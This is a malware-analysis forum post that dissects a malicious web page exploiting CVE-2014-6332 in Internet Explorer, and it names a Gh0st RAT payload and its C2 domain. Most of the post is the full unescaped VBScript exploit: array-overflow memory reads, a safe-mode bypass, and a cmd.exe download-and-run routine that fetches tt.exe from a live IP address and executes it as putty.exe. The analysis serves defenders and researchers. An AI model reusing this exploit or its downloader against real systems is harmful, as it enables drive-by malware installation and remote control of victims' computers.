A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #30631  by Antelox
 Tue Jul 25, 2017 7:51 am
ikolor wrote:thanks

https://www.virustotal.com/en/file/750f ... 500925221/
The file is an HTML page exploited by CVE-2014-6332. It contains an escaped javascript code with download&run capabilities. The unescaped javascript code is the following one:
Code: Select all
<!doctype html>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<head>
</head>
<body>

<SCRIPT LANGUAGE="VBScript">

function runmumaa() 
On Error Resume Next
Set objWsh = CreateObject("Wscript.Shell")

objWsh.run "cmd.exe /c echo >>C:\Windows\Temp\text.vbs Set xPost=createObject(""Microsoft.XMLHTTP"") & echo >>C:\Windows\Temp\text.vbs xPost.Open ""GET"",""http://107.182.21.243/tt.exe"",0 & echo >>C:\Windows\Temp\text.vbs xPost.Send() & echo >>C:\Windows\Temp\text.vbs set sGet=createObject(""ADODB.Stream"") & echo >>C:\Windows\Temp\text.vbs sGet.Mode=3 & echo >>C:\Windows\Temp\text.vbs sGet.Type=1 & echo >>C:\Windows\Temp\text.vbs sGet.Open() & echo >>C:\Windows\Temp\text.vbs sGet.Write xPost.ResponseBody & echo >>C:\Windows\Temp\text.vbs sGet.SaveToFile ""C:\Windows\Temp\putty.exe"",2",0
objWsh.run "cscript.exe C:\Windows\Temp\text.vbs",0,true
wscript.sleep 10000
objWsh.run "C:\Windows\Temp\putty.exe"
document.write(Err.Description)
end function

</script>

<SCRIPT LANGUAGE="VBScript">
 
dim   aa()
dim   ab()
dim   a0
dim   a1
dim   a2
dim   a3
dim   win9x
dim   intVersion
dim   rnda
dim   funclass
dim   myarray

Begin()

function Begin()
  On Error Resume Next
  info=Navigator.UserAgent

  if(instr(info,"Win64")>0)   then
     exit   function
  end if

  if (instr(info,"MSIE")>0)   then 
             intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))   
  else
     exit   function  
             
  end if

  win9x=0

  BeginInit()
  If Create()=True Then
     myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
     myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)

     if(intVersion<4) then
         document.write("<br> IE")
         document.write(intVersion)
         runshellcode()                    
     else  
          setnotsafemode()
     end if
  end if
end function

function BeginInit()
   Randomize()
   redim aa(5)
   redim ab(5)
   a0=13+17*rnd(6)
   a3=7+3*rnd(5)
end function

function Create()
  On Error Resume Next
  dim i
  Create=False
  For i = 0 To 400
    If Over()=True Then
    '   document.write(i)     
       Create=True
       Exit For
    End If 
  Next
end function

sub testaa()
end sub

function mydata()
    On Error Resume Next
     i=testaa
     i=null
     redim  Preserve aa(a2)  
  
     ab(0)=0
     aa(a1)=i
     ab(0)=6.36598737437801E-314

     aa(a1+2)=myarray
     ab(2)=1.74088534731324E-310  
     mydata=aa(a1)
     redim  Preserve aa(a0)  
end function 


function setnotsafemode()
    On Error Resume Next
    i=mydata()  
    i=readmemo(i+8)
    i=readmemo(i+16)
    j=readmemo(i+&h134)  
    for k=0 to &h60 step 4
        j=readmemo(i+&h120+k)
        if(j=14) then
              j=0          
              redim  Preserve aa(a2)             
     aa(a1+2)(i+&h11c+k)=ab(4)
              redim  Preserve aa(a0)  

     j=0 
              j=readmemo(i+&h120+k)   
         
               Exit for
           end if

    next 
    ab(2)=1.69759663316747E-313
    runmumaa() 
end function

function Over()
    On Error Resume Next
    dim type1,type2,type3
    Over=False
    a0=a0+a3
    a1=a0+2
    a2=a0+&h8000000
  
    redim  Preserve aa(a0) 
    redim   ab(a0)     
  
    redim  Preserve aa(a2)
  
    type1=1
    ab(0)=1.123456789012345678901234567890
    aa(a0)=10
          
    If(IsObject(aa(a1-1)) = False) Then
       if(intVersion<4) then
           mem=cint(a0+1)*16             
           j=vartype(aa(a1-1))
           if((j=mem+4) or (j*8=mem+8)) then
              if(vartype(aa(a1-1))<>0)  Then    
                 If(IsObject(aa(a1)) = False ) Then             
                   type1=VarType(aa(a1))
                 end if               
              end if
           else
             redim  Preserve aa(a0)
             exit  function

           end if 
        else
           if(vartype(aa(a1-1))<>0)  Then    
              If(IsObject(aa(a1)) = False ) Then
                  type1=VarType(aa(a1))
              end if               
            end if
        end if
    end if
              
    
    If(type1=&h2f66) Then         
          Over=True      
    End If  
    If(type1=&hB9AD) Then
          Over=True
          win9x=1
    End If  

    redim  Preserve aa(a0)          
        
end function

function ReadMemo(add) 
    On Error Resume Next
    redim  Preserve aa(a2)  
  
    ab(0)=0   
    aa(a1)=add+4     
    ab(0)=1.69759663316747E-313       
    ReadMemo=lenb(aa(a1))  
   
    ab(0)=0    
 
    redim  Preserve aa(a0)
end function

</script>

</body>
</html>
It tries to download a payload from:
Code: Select all
hxxp://107.182.21.243/tt.exe
https://www.virustotal.com/en/file/af72 ... /analysis/
https://www.hybrid-analysis.com/sample/ ... mentId=100

The payload seems to belong to Gh0st RAT AKA Miancha malware family.

C2:
Code: Select all
ianxt.f3322.net
BR,

Antelox